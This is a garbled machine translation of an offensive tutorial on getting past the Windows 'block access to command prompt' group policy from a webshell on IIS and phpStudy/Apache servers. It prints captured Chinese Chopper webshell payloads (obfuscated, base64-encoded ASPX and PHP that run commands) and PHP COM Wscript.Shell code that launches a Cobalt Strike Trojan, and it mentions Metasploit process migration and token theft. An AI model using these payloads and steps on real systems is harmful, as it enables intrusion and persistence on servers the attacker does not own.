Group policy disables command prompt bypass

0x01 Preface

A few days ago, I had a private chat with a friend who said that I had a problem executing orders ,Web The environment is phpStudy build , Commands cannot be executed in the Chinese kitchen knife virtual terminal , Tips ： The command prompt has been disabled by the system administrator . Ask if there is any way around ？ The answer is yes , Next, let's take a look at how to bypass this group policy command execution restriction .

Everybody knows phpStudy Of Apache The default is the current logged in user or System function , In this way, the time for raising rights is saved . But whether the command can be executed in the post infiltration is also a crucial step , Just like this guy , Got high authority Webshell, But I don't know how to bypass this command to go online CS, This is awkward .

0x02 Command execution intercepts the recurrence

First of all, we have to figure out why the interception prompt appears when executing the command ？？？ Because I have tested similar problems before , So I guess it may be caused by a certain group policy setting , After searching, it is found that this problem can be reproduced through the following group policies .

The setting method is as follows ：

gpedit.msc-> User configuration -> Manage templates -> System -> Block access to command prompt （ Script processing ）;

However, this setting is only valid for the currently logged in user , Yes Users、System、NetworkService And other users are invalid .

0x03 IIS Environment command execution bypasses

If the goal is IIS Environmental Science , We only need to use it in the Chinese kitchen knife virtual terminal setp The order will CS The Trojan horse is designated as a new terminal , Then enter a few characters and press enter to jump out cmd.exe perform CS Trojan goes online , As long as you can jump out of cmd.exe You can bypass .

setp C:\inetpub\wwwroot\artifact.exe

adopt WSExplorer The bag grabbing tool can see the ASPX Yes, it is System.Diagnostics To carry out an order , So you can use setp Command to specify the startup process , There are several segments in the packet base64 code , After decoding, you can see .

pass=Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dmFyIGM9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzU3RhcnRJbmZvKFN5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoxIl0pKSk7dmFyIGU9bmV3IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzKCk7dmFyIG91dDpTeXN0ZW0uSU8uU3RyZWFtUmVhZGVyLEVJOlN5c3RlbS5JTy5TdHJlYW1SZWFkZXI7Yy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7Yy5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PXRydWU7Yy5SZWRpcmVjdFN0YW5kYXJkRXJyb3I9dHJ1ZTtlLlN0YXJ0SW5mbz1jO2MuQXJndW1lbnRzPSIvYyAiK1N5c3RlbS5UZXh0LkVuY29kaW5nLkdldEVuY29kaW5nKDY1MDAxKS5HZXRTdHJpbmcoU3lzdGVtLkNvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyhSZXF1ZXN0Lkl0ZW1bInoyIl0pKTtlLlN0YXJ0KCk7b3V0PWUuU3RhbmRhcmRPdXRwdXQ7RUk9ZS5TdGFuZGFyZEVycm9yO2UuQ2xvc2UoKTtSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkrRUkuUmVhZFRvRW5kKCkpOw%3D%3D")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=QzpcaW5ldHB1Ylx3d3dyb290XGFydGlmYWN0LmV4ZQ%3D%3D&z2=Y2QgL2QgIkM6XGluZXRwdWJcd3d3cm9vdFwiJjNoYWQwdyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

Or you can ASPX Malaysia and China use the white list method to bypass ,CmdPath Fill in the whitelist file path ,Argument Fill in the path of our whitelist execution file , You can also CS/MSF Put the Trojan horse on CmdPath Just execute directly in .

0x04 Apache Environment command execution bypasses

IIS The bypass method is Apache Not available in the environment , So I found another way to bypass , adopt php call com Components wscript.shell Carry out orders , Add the following code to the 3 Replace the line with CS Trojan horse can , In the final analysis, we still have to jump out cmd.exe.

<?php
$wsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$wsh->exec("C:\ProgramData\artifact.exe");
?>

Why not system、exec、proc_open And other common commands to execute functions ？ Because they all call by default cmd.exe To carry out an order , So it will still be blocked . Such as Chinese kitchen knife PHP Is to use the proc_open, This is why Chinese kitchen knives ASPX You can use setp Bypass , and PHP You can't use it under setp The reason for bypassing .

pass=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nY21kJzskcz0nY2QgL2QgRDpcXHBocFN0dWR5XFxQSFBUdXRvcmlhbFxcV1dXXFxhdlxcMVxcJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXSc7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRhcnJheT1hcnJheShhcnJheSgicGlwZSIsInIiKSxhcnJheSgicGlwZSIsInciKSxhcnJheSgicGlwZSIsInciKSk7JGZwPXByb2Nfb3Blbigkci4iIDI%2BJjEiLCRhcnJheSwkcGlwZXMpOyRyZXQ9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pO3Byb2NfY2xvc2UoJGZwKTtwcmludCAkcmV0OztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"))

Although the group policy can be bypassed through the above methods “ Block access to command prompt ” Get the target host session , However, you cannot execute system commands directly in this session .

Need to link to MSF You can execute system commands only by using process migration or passing off a token to other users ,CS linkage MSF Time use rundll32, So it won't be intercepted again .

At this time, we have completely bypassed the group policy “ Block access to command prompt ” function , And can execute system commands normally .

Okay , This sharing is over , bye ！！！